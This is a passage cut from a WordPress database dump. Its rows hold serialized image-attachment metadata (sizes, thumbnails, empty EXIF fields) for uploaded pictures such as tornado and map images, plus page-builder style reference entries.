chment_metadata','a:6:{s:5:\"width\";i:665;s:6:\"height\";i:958;s:4:\"file\";s:19:\"2023/09/tornado.jpg\";s:8:\"filesize\";i:194403;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"tornado-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19545;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7996;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1911,1452,'_wp_attached_file','2023/09/cropped-tornado.jpg'),(1912,1452,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:645;s:6:\"height\";i:666;s:4:\"file\";s:27:\"2023/09/cropped-tornado.jpg\";s:8:\"filesize\";i:95789;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"cropped-tornado-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"cropped-tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7750;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1913,1453,'_wp_attached_file','2023/09/cropped-tornado-1.jpg'),(1914,1453,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:649;s:6:\"height\";i:936;s:4:\"file\";s:29:\"2023/09/cropped-tornado-1.jpg\";s:8:\"filesize\";i:146570;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-1-208x300.jpg\";s:5:\"width\";i:208;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8066;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1915,1455,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1921,1462,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1927,1469,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1933,1475,'_wp_attached_file','2023/09/cropped-cropped-tornado.jpg'),(1934,1475,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:645;s:6:\"height\";i:645;s:4:\"file\";s:35:\"2023/09/cropped-cropped-tornado.jpg\";s:8:\"filesize\";i:94471;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-tornado-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25070;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"cropped-cropped-tornado-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1935,1477,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1941,1484,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1946,1489,'_wp_attached_file','2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg'),(1947,1489,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1920;s:4:\"file\";s:54:\"2023/09/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\";s:8:\"filesize\";i:318416;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12242;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"raychel-sanner-cswvKS59E90-unsplash-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63222;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7110;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:47:\"raychel-sanner-cswvKS59E90-unsplash-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41190;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:49:\"raychel-sanner-cswvKS59E90-unsplash-1536x1152.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121912;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:49:\"raychel-sanner-cswvKS59E90-unsplash-2048x1536.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203814;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:39:\"raychel-sanner-cswvKS59E90-unsplash.jpg\";}'),(1948,1490,'_wp_attached_file','2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg'),(1949,1490,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1919;s:4:\"file\";s:64:\"2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg\";s:8:\"filesize\";i:254167;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:64:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14751;}s:5:\"large\";a:5:{s:4:\"file\";s:66:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83022;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:64:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7254;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:64:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52704;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:66:\"cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164607;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1951,1493,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1957,1500,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1962,1505,'_wp_attached_file','2023/09/Picture1.jpg'),(1963,1505,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:825;s:6:\"height\";i:720;s:4:\"file\";s:20:\"2023/09/Picture1.jpg\";s:8:\"filesize\";i:149869;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Picture1-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17787;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Picture1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5923;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Picture1-768x670.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:670;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88533;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1964,1506,'_wp_attached_file','2023/09/cropped-Picture1.jpg'),(1965,1506,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:531;s:6:\"height\";i:681;s:4:\"file\";s:28:\"2023/09/cropped-Picture1.jpg\";s:8:\"filesize\";i:72762;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"cropped-Picture1-234x300.jpg\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17113;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"cropped-Picture1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1967,1508,'_wp_attached_file','2023/09/cropped-cropped-Picture1.jpg'),(1968,1508,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:531;s:6:\"height\";i:531;s:4:\"file\";s:36:\"2023/09/cropped-cropped-Picture1.jpg\";s:8:\"filesize\";i:63996;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"cropped-cropped-Picture1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23208;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"cropped-cropped-Picture1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7219;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1969,1510,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1975,1517,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1981,1524,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(1987,1530,'_wp_attached_file','2023/09/map1.jpg'),(1988,1530,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:997;s:6:\"height\";i:872;s:4:\"file\";s:16:\"2023/09/map1.jpg\";s:8:\"filesize\";i:128569;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"map1-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13697;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"map1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4854;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"map1-768x672.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:672;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1989,1531,'_wp_attached_file','2023/09/cropped-map1.jpg'),(1990,1531,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:872;s:6:\"height\";i:872;s:4:\"file\";s:24:\"2023/09/cropped-map1.jpg\";s:8:\"filesize\";i:86619;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"cropped-map1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15775;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"cropped-map1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4883;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"cropped-map1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69987;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1991,1532,'_wp_attached_file','2023/09/map1-1.jpg'),(1992,1532,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:997;s:6:\"height\";i:872;s:4:\"file\";s:18:\"2023/09/map1-1.jpg\";s:8:\"filesize\";i:128569;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"map1-1-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13697;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"map1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4854;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"map1-1-768x672.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:672;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1993,1533,'_wp_attached_file','2023/09/cropped-map1-1.jpg'),(1994,1533,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:927;s:6:\"height\";i:821;s:4:\"file\";s:26:\"2023/09/cropped-map1-1.jpg\";s:8:\"filesize\";i:84210;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"cropped-map1-1-300x266.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13454;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"cropped-map1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4859;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"cropped-map1-1-768x680.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59800;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1995,1535,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:31:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;}}}'),(2001,1541,'_wp_attached_file','2023/09/cropped-tornado-2.jpg'),(2002,1541,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:647;s:6:\"height\";i:921;s:4:\"file\";s:29:\"2023/09/cropped-tornado-2.jpg\";s:8:\"filesize\";i:132580;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-2-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20054;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-tornado-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8024;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2003,1543,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:36:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;i:31;i:866;i:32;i:867;i:33;i:868;i:34;i:869;i:35;i:872;}}}'),(2009,1550,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:36:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:391;i:5;i:392;i:6;i:394;i:7;i:353;i:8;i:354;i:9;i:355;i:10;i:356;i:11;i:358;i:12;i:359;i:13;i:360;i:14;i:361;i:15;i:362;i:16;i:363;i:17;i:364;i:18;i:366;i:19;i:381;i:20;i:382;i:21;i:383;i:22;i:384;i:23;i:386;i:24;i:387;i:25;i:346;i:26;i:347;i:27;i:348;i:28;i:349;i:29;i:350;i:30;i:352;i:31;i:866;i:32;i:867;i:33;i:868;i:34;i:869;i:35;i:872;}}}'),(2015,1557,'extend_builder','a:2:{s:4:\"json\";i:438;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:36:{i:0;i:338;i:1;i:388;i:2;i:389;i:3;i:390;i:4;i:39